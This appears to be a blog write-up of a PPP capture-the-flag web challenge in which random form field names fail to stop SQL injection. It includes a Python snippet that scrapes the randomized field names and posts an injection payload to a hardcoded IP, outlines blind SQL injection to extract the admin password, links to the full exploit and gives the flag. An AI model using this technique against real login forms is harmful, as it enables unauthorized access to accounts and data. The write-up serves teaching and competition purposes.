 |
| Task description |
The site looks like it's trying to sell some security mechanism they came up with (patent pending, heh). The idea is that form fields get random names, so bots can't access the site. There is a sample application, where we can log in with "test / test" to check how their super secure solution works.
There is a HTML comment in the login form.
<!--<h3>For admin interface, admin / ???????</h3>-->
Of course randomizing names of a form won't protect you from SQL injection. This is what we get after logging in as admin:
What is left is getting the password with blind SQL injection. Let's see if we can use bots after all. This is the code that bypasses the random names and logs in with a specified username:
url = "http://54.204.80.192" resp = requests.get(url + "/example") form = resp.text.encode('utf-8') action = form.split("<form action=\"")[1].split("\"")[0] user = form.split("Username")[1].split("Password")[0].split("name=\"")[1].split("\"")[0] passwd = form.split("Password")[1].split("primary")[0].split("name=\"")[1].split("\"")[0] cookie = resp.headers['set-cookie'] resp = requests.post(url + action, data={user: payload, passwd: "test"}, headers={'Cookie': cookie}) res = resp.text.encode('utf-8')
Now we can plug this into our blind injection script, and it will spit out the table name, column name and eventually the password. Here is the final exploit: https://gist.github.com/balidani/e541f5ff39f6f3d41156
And the flag was n0b0t5_C4n_bYpa5s_p0lYm0rph1Sm
Oh, but they can!
Awesome CTF from PPP, thanks for organizing it, I need to catch up on some work and sleep now.
This comment has been removed by the author.
ReplyDelete